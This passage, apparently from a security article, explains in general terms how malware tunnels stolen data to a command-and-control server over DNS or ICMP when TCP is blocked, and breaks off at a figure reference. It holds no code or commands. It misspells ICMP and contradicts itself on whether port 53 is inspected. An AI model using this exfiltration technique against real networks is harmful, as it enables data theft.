Criminals are constantly changing their modus operandi and using different strategies and techniques to compromise their targets and exfiltrate data from the internal networks, even in the most difficult situations. For example, TCP traffic is blocked by default in a network, and the communication between a malicious agent installed on a specific target with its C2 server is not possible. In those kinds of scenarios, using other network protocols like ICPM and DNS could be the perfect vehicle to accomplish the hard task of transferring internal information over the barriers.
What is DNS protocol
The DNS protocol is increasingly being used as a pathway for data exfiltration, even by infected devices previously infected by threat insiders during its malicious activities. DNS tunneling involves sending the network traffic via DNS port 53, which is often inspected and flagged by network firewalls, even next-generation ones.
Malicious software can use specially crafted requests to take advantage of the DNS protocol and send only well-defined chunks in the middle of a potential legitimate DNS traffic. Figure 1 below shows how the basic data about a target machine could be sent between the internal agent and its C2 server available on the internet. [CLICK